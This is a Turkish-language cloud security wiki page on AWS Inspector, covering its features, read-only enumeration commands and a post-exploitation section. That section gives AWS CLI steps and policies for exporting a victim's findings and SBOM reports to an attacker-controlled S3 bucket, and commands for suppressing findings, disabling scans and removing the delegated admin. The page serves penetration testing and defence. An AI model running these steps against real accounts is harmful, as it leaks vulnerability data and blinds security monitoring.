AWS - Inspector Enum

AWS - Inspector Enum

Inspector

Amazon Inspector, AWS ortamınızın güvenliğini artırmak için tasarlanmış gelişmiş, otomatik bir zafiyet yönetim hizmetidir. Bu hizmet, Amazon EC2 örneklerini, Amazon ECR'deki konteyner görüntülerini, Amazon ECS'yi ve AWS Lambda işlevlerini sürekli olarak zafiyetler ve istenmeyen ağ maruziyeti için tarar. Güçlü bir zafiyet istihbarat veritabanından yararlanarak, Amazon Inspector, ciddiyet seviyeleri ve düzeltme önerileri dahil olmak üzere ayrıntılı bulgular sunar ve kuruluşların güvenlik risklerini proaktif bir şekilde tanımlayıp ele almasına yardımcı olur. Bu kapsamlı yaklaşım, çeşitli AWS hizmetleri arasında güçlendirilmiş bir güvenlik duruşu sağlar ve uyum ile risk yönetimine yardımcı olur.

Ana unsurlar

Bulgular

Amazon Inspector'daki bulgular, EC2 örneklerinin, ECR depolarının veya Lambda işlevlerinin taranması sırasında keşfedilen zafiyetler ve maruziyetler hakkında ayrıntılı raporlardır. Durumuna göre, bulgular şu şekilde kategorize edilir:

• Aktif: Bulgular düzeltilmemiştir.

• Kapalı: Bulgular düzeltilmiştir.

• Baskılanmış: Bulgular, bir veya daha fazla baskılama kuralı nedeniyle bu durumla işaretlenmiştir.

Bulgular ayrıca üç türde kategorize edilir:

• Paket: Bu bulgular, kaynaklarınızda kurulu yazılım paketlerindeki zafiyetlerle ilgilidir. Örnekler, bilinen güvenlik sorunlarına sahip eski kütüphaneler veya bağımlılıklardır.

• Kod: Bu kategori, AWS kaynaklarınızda çalışan uygulamaların kodunda bulunan zafiyetleri içerir. Yaygın sorunlar, güvenlik ihlallerine yol açabilecek kodlama hataları veya güvensiz uygulamalardır.

• Ağ: Ağ bulguları, saldırganlar tarafından istismar edilebilecek ağ yapılandırmalarındaki potansiyel maruziyetleri tanımlar. Bunlar, açık portlar, güvensiz ağ protokolleri ve yanlış yapılandırılmış güvenlik gruplarını içerir.

Filtreler ve Baskılama Kuralları

Amazon Inspector'daki filtreler ve baskılama kuralları, bulguları yönetmeye ve önceliklendirmeye yardımcı olur. Filtreler, bulguları ciddiyet veya kaynak türü gibi belirli kriterlere göre daraltmanıza olanak tanır. Baskılama kuralları, düşük risk olarak kabul edilen, zaten hafifletilmiş veya başka önemli bir nedenle baskılanması gereken belirli bulguları baskılamanıza olanak tanır; bu, güvenlik raporlarınızı aşırı yüklenmekten korur ve daha kritik sorunlara odaklanmanıza yardımcı olur.

Yazılım Malzeme Listesi (SBOM)

Amazon Inspector'daki Yazılım Malzeme Listesi (SBOM), bir yazılım paketinin içindeki tüm bileşenleri, kütüphaneler ve bağımlılıklar dahil olmak üzere ayrıntılı bir şekilde listeleyen dışa aktarılabilir bir envanter listesidir. SBOM'lar, yazılım tedarik zincirine şeffaflık sağlamaya yardımcı olur, daha iyi zafiyet yönetimi ve uyum sağlar. Açık kaynak ve üçüncü taraf yazılım bileşenleriyle ilişkili riskleri tanımlamak ve hafifletmek için kritik öneme sahiptir.

Ana özellikler

Bulguları Dışa Aktarma

Amazon Inspector, bulguları Amazon S3 Buckets, Amazon EventBridge ve AWS Security Hub'a dışa aktarma yeteneği sunar; bu, belirli bir tarih ve saatte daha fazla analiz veya paylaşım için tanımlanan zafiyetler ve maruziyetler hakkında ayrıntılı raporlar oluşturmanıza olanak tanır. Bu özellik, CSV ve JSON gibi çeşitli çıktı formatlarını destekler, diğer araçlar ve sistemlerle entegrasyonu kolaylaştırır. Dışa aktarma işlevi, raporlara dahil edilen verilerin özelleştirilmesine olanak tanır; bu, bulguları ciddiyet, kaynak türü veya tarih aralığı gibi belirli kriterlere göre filtrelemenizi sağlar ve varsayılan olarak mevcut AWS Bölgesi'ndeki tüm bulgularınızı Aktif durumla dahil eder.

Bulguları dışa aktarırken, verileri dışa aktarım sırasında şifrelemek için bir Anahtar Yönetim Hizmeti (KMS) anahtarı gereklidir. KMS anahtarları, dışa aktarılan bulguların yetkisiz erişime karşı korunmasını sağlar ve hassas zafiyet bilgileri için ekstra bir güvenlik katmanı sağlar.

Amazon EC2 örneklerinin taranması

Amazon Inspector, zafiyetleri ve güvenlik sorunlarını tespit etmek için Amazon EC2 örnekleri için güçlü tarama yetenekleri sunar. Inspector, EC2 örneğinden çıkarılan meta verileri, paket zafiyetleri ve ağ erişilebilirlik sorunları üretmek için güvenlik tavsiyelerindeki kurallarla karşılaştırır. Bu taramalar, hesabınızın tarama modu ayarlarına bağlı olarak ajan tabanlı veya ajansız yöntemlerle gerçekleştirilebilir.

• Ajan Tabanlı: Derinlemesine taramalar gerçekleştirmek için AWS Systems Manager (SSM) ajanını kullanır. Bu yöntem, örnekten doğrudan kapsamlı veri toplama ve analiz yapma olanağı sağlar.

• Ajansız: Örnekte bir ajan kurulumunu gerektirmeyen hafif bir alternatif sunar, her EC2 örneğinin her bir hacminin EBS anlık görüntüsünü oluşturur, zafiyetleri arar ve ardından siler; mevcut AWS altyapısını tarama için kullanır.

Tarama modu, EC2 taramalarını gerçekleştirmek için hangi yöntemin kullanılacağını belirler:

• Ajan Tabanlı: Derin inceleme için EC2 örneklerine SSM ajanının kurulmasını içerir.

• Hibrit Tarama: Kapsamı maksimize etmek ve performans etkisini minimize etmek için hem ajan tabanlı hem de ajansız yöntemleri birleştirir. SSM ajanının kurulu olduğu EC2 örneklerinde, Inspector ajan tabanlı bir tarama gerçekleştirecek, SSM ajanının olmadığı örneklerde ise ajansız bir tarama yapılacaktır.

Bir diğer önemli özellik, EC2 Linux örnekleri için derin incelemedir. Bu özellik, EC2 Linux örneklerinin yazılımı ve yapılandırması hakkında kapsamlı bir analiz sunar, işletim sistemi zafiyetleri, uygulama zafiyetleri ve yanlış yapılandırmalar dahil olmak üzere ayrıntılı zafiyet değerlendirmeleri sağlar ve kapsamlı bir güvenlik değerlendirmesi sunar. Bu, özel yolların ve tüm alt dizinlerinin incelenmesi yoluyla gerçekleştirilir. Varsayılan olarak, Amazon Inspector aşağıdakileri tarar, ancak her üye hesap 5'e kadar özel yol tanımlayabilir ve her delege edilmiş yönetici 10'a kadar tanımlayabilir:

• /usr/lib

• /usr/lib64

• /usr/local/lib

• /usr/local/lib64

Amazon ECR konteyner görüntülerinin taranması

Amazon Inspector, Amazon Elastic Container Registry (ECR) konteyner görüntüleri için güçlü tarama yetenekleri sunar ve paket zafiyetlerinin etkili bir şekilde tespit edilmesini ve yönetilmesini sağlar.

• Temel Tarama: Bu, konteyner görüntülerindeki bilinen işletim sistemi paketleri zafiyetlerini tanımlayan hızlı ve hafif bir taramadır; açık kaynak Clair projesinden standart bir kural seti kullanır. Bu tarama yapılandırmasıyla, depolarınız itme sırasında veya manuel taramalar gerçekleştirildiğinde taranacaktır.

• Gelişmiş Tarama: Bu seçenek, itme taramasına ek olarak sürekli tarama özelliğini ekler. Gelişmiş tarama, her konteyner görüntüsünün katmanlarına daha derinlemesine dalarak işletim sistemi paketlerindeki ve programlama dilleri paketlerindeki zafiyetleri daha yüksek bir doğrulukla tanımlar. Hem temel görüntüyü hem de ek katmanları analiz ederek potansiyel güvenlik sorunlarının kapsamlı bir görünümünü sağlar.

Amazon Lambda işlevlerinin taranması

Amazon Inspector, AWS Lambda işlevleri ve katmanları için kapsamlı tarama yetenekleri içerir ve sunucusuz uygulamaların güvenliğini ve bütünlüğünü sağlar. Inspector, Lambda işlevleri için iki tür tarama sunar:

• Lambda standart taraması: Bu varsayılan özellik, Lambda işlevinize ve katmanlarınıza eklenen yazılım zafiyetlerini tanımlar. Örneğin, işleviniz bilinen bir zafiyete sahip bir kütüphane versiyonu kullanıyorsa, bir bulgu oluşturur.

• Lambda kod taraması: Özel uygulama kodunu güvenlik sorunları için analiz eder, enjeksiyon hataları, veri sızıntıları, zayıf kriptografi ve eksik şifreleme gibi zafiyetleri tespit eder. Tespit edilen zafiyetleri vurgulayan kod parçacıklarını yakalar, örneğin, sabit kodlanmış kimlik bilgileri. Bulgular, sorunları düzeltmek için ayrıntılı düzeltme önerileri ve kod parçacıkları içerir.

Internet Güvenliği Merkezi (CIS) taramaları

Amazon Inspector, Amazon EC2 örnek işletim sistemlerini Internet Güvenliği Merkezi (CIS) tarafından önerilen en iyi uygulama önerilerine karşı değerlendirmek için CIS taramaları içerir. Bu taramalar, yapılandırmaların endüstri standartı güvenlik temel çizgilerine uyduğundan emin olur.

• Yapılandırma: CIS taramaları, sistem yapılandırmalarının belirli CIS Benchmark önerilerini karşılayıp karşılamadığını değerlendirir; her kontrol, bir CIS kontrol kimliği ve başlığı ile bağlantılıdır.

• Uygulama: Taramalar, örnek etiketlerine ve tanımlı takvimlere göre gerçekleştirilir veya planlanır.

• Sonuçlar: Tarama sonrası sonuçlar, hangi kontrollerin geçtiğini, atlandığını veya başarısız olduğunu gösterir ve her örneğin güvenlik duruşu hakkında bilgi sağlar.

Enumeration

# Administrator and member accounts #

## Retrieve information about the AWS Inpsector delegated administrator for your organization (ReadOnlyAccess policy is enough for this)
aws inspector2 get-delegated-admin-account

## List the members who are associated with the AWS Inspector administrator account (ReadOnlyAccess policy is enough for this)
aws inspector2 list-members [--only-associated | --no-only-associated]
## Retrieve information about a member account (ReadOnlyAccess policy is enough for this)
aws inspector2 get-member --account-id <value>
## Retrieve the status of AWS accounts within your environment (ReadOnlyAccess policy is enough for this)
aws inspector2 batch-get-account-status [--account-ids <value>]
## Retrieve the free trial status for the specified accounts (ReadOnlyAccess policy is enough for this)
aws inspector2 batch-get-free-trial-info --account-ids <value>
## Retrieve the EC2 Deep Inspection status for the member accounts (Requires to be the delegated administrator)
aws inspector2 batch-get-member-ec2-deep-inspection-status [--account-ids <value>]

## List an account's permissions associated with AWS Inspector
aws inspector2 list-account-permissions

# Findings #

## List a subset of information of the findings for your envionment (ReadOnlyAccess policy is enough for this)
aws inspector2 list-findings
## Retrieve vulnerability intelligence details for the specified findings
aws inspector2 batch-get-finding-details --finding-arns <value>
## List statistical and aggregated finding data (ReadOnlyAccess policy is enough for this)
aws inspector2 list-finding-aggregations --aggregation-type <FINDING_TYPE | PACKAGE | TITLE | REPOSITORY | AMI | AWS_EC2_INSTANCE | AWS_ECR_CONTAINER | IMAGE_LAYER\
| ACCOUNT AWS_LAMBDA_FUNCTION | LAMBDA_LAYER> [--account-ids <value>]
## Retrieve code snippet information about one or more specified code vulnerability findings
aws inspector2 batch-get-code-snippet --finding-arns <value>
## Retrieve the status for the specified findings report (ReadOnlyAccess policy is enough for this)
aws inspector2 get-findings-report-status --report-id <value>

# CIS #

## List CIS scan configurations (ReadOnlyAccess policy is enough for this)
aws inspector2 list-cis-scan-configurations
## List the completed CIS scans (ReadOnlyAccess policy is enough for this)
aws inspector2 list-cis-scans
## Retrieve a report from a completed CIS scan
aws inspector2 get-cis-scan-report --scan-arn <value> [--target-accounts <value>]
## Retrieve details about the specific CIS scan over the specified resource
aws inspector2 get-cis-scan-result-details --account-id <value> --scan-arn <value> --target-resource-id <value>
## List CIS scan results broken down by check
aws inspector2 list-cis-scan-results-aggregated-by-checks --scan-arn <value>
## List CIS scan results broken down by target resource
aws inspector2 list-cis-scan-results-aggregated-by-target-resource --scan-arn <value>

# Configuration #

## Describe AWS Inspector settings for AWS Organization (ReadOnlyAccess policy is enough for this)
aws inspector2 describe-organization-configuration
## Retrieve the configuration settings about EC2 scan and ECR re-scan
aws inspector2 get-configuration
## Retrieve EC2 Deep Inspection configuration associated with your account
aws inspector2 get-ec2-deep-inspection-configuration

# Miscellaneous #

## Retrieve the details of a Software Bill of Materials (SBOM) report
aws inspector2 get-sbom-export --report-id <value>

## Retrieve the coverage details for the specified vulnerabilities
aws inspector2 search-vulnerabilities --filter-criteria <vulnerabilityIds=id1,id2..>

## Retrieve the tags attached to the specified resource
aws inspector2 list-tags-for-resource --resource-arn <value>

## Retrieve the AWS KMS key used to encrypt the specified code snippets
aws inspector2 get-encryption-key --resource-type <AWS_EC2_INSTANCE | AWS_ECR_CONTAINER_IMAGE | AWS_ECR_REPOSITORY | AWS_LAMBDA_FUNCTION> --scan-type <NETWORK | PACKAGE | CODE>

## List the filters associated to your AWS account
aws inspector2 list-filters

## List the types of statistics AWS Inspector can generate (ReadOnlyAccess policy is enough for this)
aws inspector2 list-coverage
## Retrieve statistical data and about the resources AWS Inspector monitors (ReadOnlyAccess policy is enough for this)
aws inspector2 list-coverage-statistics

## List the aggregated usage total over the last 30 days
aws inspector2 list-usage-totals [--account-ids <value>]

### INSPECTOR CLASSIC ###

## Assessments info, there is a "describe" action for each one to get more info
aws inspector list-assessment-runs
aws inspector list-assessment-targets
aws inspector list-assessment-templates
aws inspector list-event-subscriptions

## Get findings
aws inspector list-findings

## Get exclusions
aws inspector list-exclusions --assessment-run-arn <arn>

## Rule packages
aws inspector list-rules-packages

Post Exploitation

inspector2:CreateFindingsReport, inspector2:CreateSBOMReport

Bir saldırgan, zayıflıkların veya yazılım malzeme listelerinin (SBOM) ayrıntılı raporlarını oluşturabilir ve bunları AWS ortamınızdan dışarı aktarabilir. Bu bilgi, belirli zayıflıkları, güncel olmayan yazılımları veya güvensiz bağımlılıkları tanımlamak için kullanılabilir ve hedefli saldırılara olanak tanır.

# Findings report
aws inspector2 create-findings-report --report-format <CSV | JSON> --s3-destination <bucketName=string,keyPrefix=string,kmsKeyArn=string> [--filter-criteria <value>]
# SBOM report
aws inspector2 create-sbom-report --report-format <CYCLONEDX_1_4 | SPDX_2_3> --s3-destination <bucketName=string,keyPrefix=string,kmsKeyArn=string> [--resource-filter-criteria <value>]

1. Bir Amazon S3 Bucket oluşturun ve kurban Amazon Inspector'dan erişilebilir olması için ona bir politika ekleyin:

{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "allow-inspector",
"Effect": "Allow",
"Principal": {
"Service": "inspector2.amazonaws.com"
},
"Action": [
"s3:PutObject",
"s3:PutObjectAcl",
"s3:AbortMultipartUpload"
],
"Resource": "arn:aws:s3:::inspector-findings/*",
"Condition": {
"StringEquals": {
"aws:SourceAccount": "<victim-account-id>"
},
"ArnLike": {
"aws:SourceArn": "arn:aws:inspector2:us-east-1:<victim-account-id>:report/*"
}
}
}
]
}

1. Bir Amazon KMS anahtarı oluşturun ve kurbanın Amazon Inspector'ü tarafından kullanılabilmesi için ona bir politika ekleyin:

{
"Version": "2012-10-17",
"Id": "key-policy",
"Statement": [
{
...
},
{
"Sid": "Allow victim Amazon Inspector to use the key",
"Effect": "Allow",
"Principal": {
"Service": "inspector2.amazonaws.com"
},
"Action": [
"kms:Encrypt",
"kms:Decrypt",
"kms:ReEncrypt*",
"kms:GenerateDataKey*",
"kms:DescribeKey"
],
"Resource": "*",
"Condition": {
"StringEquals": {
"aws:SourceAccount": "<victim-account-id>"
}
}
}
]
}

1. Bulgular raporunu oluşturma komutunu çalıştırarak dışarı aktarın:

aws --region us-east-1 inspector2 create-findings-report --report-format CSV --s3-destination bucketName=<attacker-bucket-name>,keyPrefix=exfiltration_,kmsKeyArn=arn:aws:kms:us-east-1:123456789012:key/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f

• Potansiyel Etki: Detaylı zafiyet ve yazılım raporlarının üretilmesi ve dışa aktarılması, belirli zafiyetler ve güvenlik zayıflıkları hakkında içgörüler elde edilmesi.

inspector2:CancelFindingsReport, inspector2:CancelSbomExport

Bir saldırgan, belirtilen bulgular raporunun veya SBOM raporunun üretilmesini iptal edebilir, bu da güvenlik ekiplerinin zafiyetler ve yazılım malzeme listeleri (SBOM'lar) hakkında zamanında bilgi almasını engelleyerek güvenlik sorunlarının tespitini ve düzeltmesini geciktirebilir.

# Cancel findings report generation
aws inspector2 cancel-findings-report --report-id <value>
# Cancel SBOM report generatiom
aws inspector2 cancel-sbom-export --report-id <value>

• Potansiyel Etki: Güvenlik izleme sisteminin kesintiye uğraması ve güvenlik sorunlarının zamanında tespit edilmesi ve giderilmesinin engellenmesi.

inspector2:CreateFilter, inspector2:UpdateFilter, inspector2:DeleteFilter

Bu izinlere sahip bir saldırgan, hangi güvenlik açıklarının ve güvenlik sorunlarının raporlanacağını veya bastırılacağını belirleyen filtreleme kurallarını manipüle edebilir (eğer action SUPPRESS olarak ayarlandıysa, bir bastırma kuralı oluşturulacaktır). Bu, kritik güvenlik açıklarını güvenlik yöneticilerinden gizleyerek, bu zayıflıkları tespit edilmeden istismar etmeyi kolaylaştırabilir. Önemli filtreleri değiştirerek veya kaldırarak, bir saldırgan ayrıca sistemi alakasız bulgularla doldurarak gürültü yaratabilir, bu da etkili güvenlik izleme ve yanıtı engelleyebilir.

# Create
aws inspector2 create-filter --action <NONE | SUPPRESS> --filter-criteria <value> --name <value> [--reason <value>]
# Update
aws inspector2 update-filter --filter-arn <value> [--action <NONE | SUPPRESS>] [--filter-criteria <value>] [--reason <value>]
# Delete
aws inspector2 delete-filter --arn <value>

• Potansiyel Etki: Kritik zafiyetlerin gizlenmesi veya bastırılması ya da sistemi alakasız bulgularla doldurma.

inspector2:DisableDelegatedAdminAccount, (inspector2:EnableDelegatedAdminAccount & organizations:ListDelegatedAdministrators & organizations:EnableAWSServiceAccess & iam:CreateServiceLinkedRole)

Bir saldırgan, güvenlik yönetim yapısını önemli ölçüde bozabilir.

• Delegated admin hesabını devre dışı bırakarak, saldırgan güvenlik ekibinin Amazon Inspector ayarlarına ve raporlarına erişimini ve yönetimini engelleyebilir.

• Yetkisiz bir admin hesabının etkinleştirilmesi, saldırgana güvenlik yapılandırmalarını kontrol etme imkanı tanır; bu, taramaları devre dışı bırakma veya kötü niyetli faaliyetleri gizlemek için ayarları değiştirme potansiyeline sahiptir.

# Disable
aws inspector2 disable-delegated-admin-account --delegated-admin-account-id <value>
# Enable
aws inspector2 enable-delegated-admin-account --delegated-admin-account-id <value>

• Potansiyel Etki: Güvenlik yönetiminin kesintiye uğraması.

inspector2:AssociateMember, inspector2:DisassociateMember

Bir saldırgan, Amazon Inspector organizasyonu içindeki üye hesaplarının ilişkilendirilmesini manipüle edebilir. Yetkisiz hesapları ilişkilendirerek veya meşru olanları ilişkilendirmeyerek, bir saldırgan güvenlik taramalarına ve raporlamaya hangi hesapların dahil edileceğini kontrol edebilir. Bu, kritik hesapların güvenlik izleme dışına çıkarılmasına yol açabilir ve saldırganın bu hesaplardaki zafiyetleri tespit edilmeden istismar etmesine olanak tanıyabilir.

# Associate
aws inspector2 associate-member --account-id <value>
# Disassociate
aws inspector2 disassociate-member --account-id <value>

• Potansiyel Etki: Ana hesapların güvenlik taramalarından hariç tutulması, zafiyetlerin tespit edilmeden istismar edilmesine olanak tanır.

inspector2:Disable, (inspector2:Enable & iam:CreateServiceLinkedRole)

inspector2:Disable iznine sahip bir saldırgan, belirli hesaplar üzerindeki belirli kaynak türleri (EC2, ECR, Lambda, Lambda kodu) için güvenlik taramalarını devre dışı bırakabilir, bu da AWS ortamının bazı kısımlarının izlenmeden kalmasına ve saldırılara karşı savunmasız olmasına neden olur. Ayrıca, inspector2:Enable & iam:CreateServiceLinkedRole izinlerine sahip olarak, bir saldırgan şüpheli yapılandırmaların tespit edilmesini önlemek için taramaları seçici olarak yeniden etkinleştirebilir.

# Disable
aws inspector2 disable --account-ids <value> [--resource-types <{EC2, ECR, LAMBDA, LAMBDA_CODE}>]
# Enable
aws inspector2 enable --resource-types <{EC2, ECR, LAMBDA, LAMBDA_CODE}> [--account-ids <value>]

• Potansiyel Etki: Güvenlik izleme alanında kör noktaların oluşumu.

inspector2:UpdateOrganizationConfiguration

Bu izne sahip bir saldırgan, Amazon Inspector organizasyonunuzun yapılandırmalarını güncelleyebilir ve bu da yeni üye hesapları için etkinleştirilen varsayılan tarama özelliklerini etkileyebilir.

aws inspector2 update-organization-configuration --auto-enable <ec2=true|false,ecr=true|false,lambda=true|false,lambdaCode=true|false>

• Potansiyel Etki: Organizasyon için güvenlik tarama politikalarını ve yapılandırmalarını değiştirmek.

inspector2:TagResource, inspector2:UntagResource

Bir saldırgan, güvenlik değerlendirmelerini düzenlemek, izlemek ve otomatikleştirmek için kritik olan AWS Inspector kaynaklarındaki etiketleri manipüle edebilir. Etiketleri değiştirerek veya kaldırarak, bir saldırgan güvenlik taramalarından zafiyetleri gizleyebilir, uyum raporlamasını bozabilir ve otomatik düzeltme süreçlerine müdahale edebilir, bu da kontrolsüz güvenlik sorunlarına ve sistem bütünlüğünün tehlikeye girmesine yol açabilir.

aws inspector2 tag-resource --resource-arn <value> --tags <value>
aws inspector2 untag-resource --resource-arn <value> --tag-keys <value>

• Potansiyel Etki: Zafiyetlerin gizlenmesi, uyum raporlamasının kesintiye uğraması, güvenlik otomasyonunun kesintiye uğraması ve maliyet tahsisinin kesintiye uğraması.

Referanslar

• https://docs.aws.amazon.com/inspector/latest/user/what-is-inspector.html

• https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazoninspector2.html